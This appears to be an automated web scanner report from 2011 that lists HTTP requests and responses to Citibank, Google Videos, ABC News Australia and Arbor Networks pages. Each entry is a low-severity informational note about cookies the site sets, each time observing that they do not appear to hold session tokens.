HTTP/1.1 302 Moved Temporarily Date: Wed, 02 Feb 2011 21:59:59 GMT Server: Hitbox Gateway 9.3.6-rc1 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM" Set-Cookie: CTG=1296683999; path=/; domain=vendorweb.citibank.com; expires=Wed, 09-Feb-2011 21:59:59 GMT; max-age=604800 nnCoection: close Pragma: no-cache Cache-Control: max-age=0, private, proxy-revalidate Expires: Wed, 02 Feb 2011 22:00:00 GMT Location: http://vendorweb.citibank.com/HGct?hc=&hb=DM550608DPBR&cd=1&hv=6&n=/Citi+Home&con=&vcon=/CBOL/Home&tt=auto&ja=y&dt=16&zo=360&lm=1296102623000&bn=Netscape&ce=y&ss=1920*1200&sc=16&sv=16&cy=u&hp=u&ln=en-US&vpc=HBX0200u&vjs=HBX0201.03u&hec=0&pec=&cmp=&gp=&dcmp=&dcmpe=&dcmpre=&cp=null&fnl=&seg=1,-2&epg=&cv=&gn=&ld=&la=&c1=&c2=&c3=&c4=&customerid=&ttt=lid,lpos&ra=&pu=&rf=bookmark&pl=Chrome%20PDF%20Viewer%3AGoogle%20Gears%200.5.33.0%3AShockwave%20Flash%3AJava%20Deployment%20Toolkit%206.0.230.5%3AJava%28TM%29%20Platform%20SE%206%20U23%3AWPI%20Detector%201.1%3AGoogle%20Update%3ASilverlight%20Plug-In%3ADefault%20Plug-in%3A&lv.id=Header_Open%20an%20Account,Header_Find%20Citi%20Locations,Header_Search,Header_Help,Header_Contact%20Us,Header_Security,Header_Privacy,Header_Citi.com,PublicMenu_Banking%20Overview,PublicMenu_Checking,PublicMenu_Savings,PublicMenu_Certificates%20of%20Deposit%28CDs%29,PublicMenu_IRAs%20And%20IRA%20Rollovers,&lv.pos=,,,,,,,,,,,,,&hid=0.46637816983275115 Content-Type: image/gif Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /HGct?hc=&hb=DM550608DPBR&cd=1&hv=6&n=/Citi+Home&con=&vcon=/CBOL/Home&tt=auto&ja=y&dt=16&zo=360&lm=1296102623000&bn=Netscape&ce=y&ss=1920*1200&sc=16&sv=16&cy=u&hp=u&ln=en-US&vpc=HBX0200u&vjs=HBX0201.03u&hec=0&pec=&cmp=&gp=&dcmp=&dcmpe=&dcmpre=&cp=null&fnl=&seg=1,-2&epg=&cv=&gn=&ld=&la=&c1=&c2=&c3=&c4=&customerid=&ttt=lid,lpos&ra=&pu=&rf=bookmark&pl=Chrome%20PDF%20Viewer%3AGoogle%20Gears%200.5.33.0%3AShockwave%20Flash%3AJava%20Deployment%20Toolkit%206.0.230.5%3AJava%28TM%29%20Platform%20SE%206%20U23%3AWPI%20Detector%201.1%3AGoogle%20Update%3ASilverlight%20Plug-In%3ADefault%20Plug-in%3A&lv.id=Header_Open%20an%20Account,Header_Find%20Citi%20Locations,Header_Search,Header_Help,Header_Contact%20Us,Header_Security,Header_Privacy,Header_Citi.com,PublicMenu_Banking%20Overview,PublicMenu_Checking,PublicMenu_Savings,PublicMenu_Certificates%20of%20Deposit%28CDs%29,PublicMenu_IRAs%20And%20IRA%20Rollovers,&lv.pos=,,,,,,,,,,,,,&hid=0.46637816983275115 HTTP/1.1
Host: vendorweb.citibank.com
Proxy-Connection: keep-alive
Referer: http://www.citi.com/domain/home.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CTG=1296683999
Response
HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:00 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: WSS_GW=V1z%B^eeiCrrr; path=/; domain=vendorweb.citibank.com; expires=Thu, 02-Feb-2012 22:00:00 GMT; max-age=31536000
Set-Cookie: DM550608DPBRV6=V1rrrrr"rz%B^eeiCrrr%^re^Cz%zrzr"%B^eeiCrrrz%B^eeiCrrr"%B^eeiCrrr"%B^eeiCrrr%^re^C"rz]%6%B^eeiCrrr6%z(xB$5><0xB$':maxB$52f2xBr':maz7}z)O:ma6r"OuKr6%XzA65><06':ma652f2H':mazu::dmIhd; path=/; domain=vendorweb.citibank.com; expires=Thu, 02-Feb-2012 22:00:00 GMT; max-age=31536000
Set-Cookie: CTG=1296684000; path=/; domain=vendorweb.citibank.com; expires=Wed, 09-Feb-2011 22:00:00 GMT; max-age=604800
nnCoection: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Wed, 02 Feb 2011 22:00:01 GMT
Content-Type: image/gif
Content-Length: 43
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1
Host: video.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 03 Feb 2011 01:05:06 GMT
Expires: Thu, 03 Feb 2011 01:05:06 GMT
Cache-Control: private, max-age=0
Set-Cookie: PREF=ID=451bdac0aa428edb:TM=1296695106:LM=1296695106:S=qUfuqTtbKJhEKHvk; expires=Sat, 02-Feb-2013 01:05:06 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: VSFE_1.0
X-XSS-Protection: 1; mode=block
Connection: close
<!doctype html> <meta content="text/html; charset=UTF-8" http-equiv=content-type> <meta content="Search millions of videos from across the web." name=description> <title>Google Videos</title> <script> ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /news/stories/2011/01/20/3117032.htm HTTP/1.1
Host: www.abc.net.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Cache-Control: max-age=300
Expires: Thu, 03 Feb 2011 01:10:09 GMT
Date: Thu, 03 Feb 2011 01:05:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ABCGuestID=24.143.206.110.73161296695109607; expires=Thu, 03-Feb-2011 01:35:09 GMT; path=/; domain=abc.net.au
Content-Length: 41425
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml:lang="en" xmlns="http://www.w3.org/1999/xht ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rural/news/content/201102/s3126694.htm HTTP/1.1
Host: www.abc.net.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Cache-Control: max-age=300
Expires: Thu, 03 Feb 2011 01:10:08 GMT
Date: Thu, 03 Feb 2011 01:05:08 GMT
Content-Length: 10862
Connection: close
Set-Cookie: ABCGuestID=24.143.206.110.73161296695108706; expires=Thu, 03-Feb-2011 01:35:08 GMT; path=/; domain=abc.net.au
<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd"> <html> <head>
<title>Tuna industry seeks lift in quotas, after boom se ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1
Host: www.arbornetworks.com
Proxy-Connection: keep-alive
Referer: http://www.arbornetworks.com/report
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: e411486dda3a9a212ec0bba8fd7ed343=-; mbfcookie[lang]=en; PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; __utmc=186398841; __utmb=186398841.1.10.1296689848
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cleanpipes HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cn/865.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cn/infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /contact HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /de/5.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /de/infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /deeppacketinspection HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/9.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/about-arbor-networks-a-leader-in-network-monitoring-and-security-solutions.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/arbor-in-action-global-network-security-solution-resources.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/arbor-networks-sixth-annual-worldwide-infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/arbor-powers-continent-8-technologies-ddos-mitigation-service.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/asert-arbor-security-engineering-response-team-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/atlas-global-network-threat-analysis-460.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/channel-partners-3.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/com-5fcontent/view-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/com-5fcontent/view-3.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/contact-us-4.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/contact-us.html HTTP/1.1
Host: www.arbornetworks.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=aed38ed91c928cbeafc242634170f7eb; e585cbcac8f7bba066a55f149566ddd5=-; __utmz=186398841.1296696461.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/32; e411486dda3a9a212ec0bba8fd7ed343=5e36548abe003c359e3e6d61a215e937; mbfcookie[lang]=en; __utma=186398841.1861161794.1296689848.1296689848.1296696461.2; __utmc=186398841; __utmb=186398841.2.10.1296696461
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/customer-solution-briefs.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/fingerprint-sharing-alliance-defending-against-network-attacks-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/ipv6-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/meet-our-partners.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/network-monitoring-security-news-events.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/network-security-experts-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/network-security-monitoring-solutions-for-your-industry.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/network-security-research-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
